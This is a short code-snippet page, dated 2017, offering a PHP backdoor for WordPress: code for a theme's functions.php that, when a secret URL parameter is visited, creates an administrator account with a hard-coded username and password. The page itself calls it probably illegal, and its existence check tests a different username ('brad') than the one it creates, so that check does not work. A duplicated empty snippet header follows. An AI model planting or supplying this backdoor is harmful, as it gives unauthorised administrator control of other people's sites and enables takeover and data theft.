January 26, 2017

Backdoor in WordPress

Description:

The following is probably illegal and should be used only with utmost caution.

Simply place the code in the PHP section in your themes functions.php file and upload to your web server.

To activate this code simply visit http://example.com?backdoor=go

When triggered the code will create a new administrator account with a user ‘user’ and password ‘pa55w0rd’. The function also verifies the user account doesn’t exist first before creating it.

Kind:

PHP

PHP:

add_action('wp_head', 'my_backdoor');
 
function my_backdoor() {
    If ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        If (!username_exists('brad')) {
            $user_id = wp_create_user('user', 'pa55w0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

Code snippets

Backdoor in WordPress

Description:

Kind:

PHP: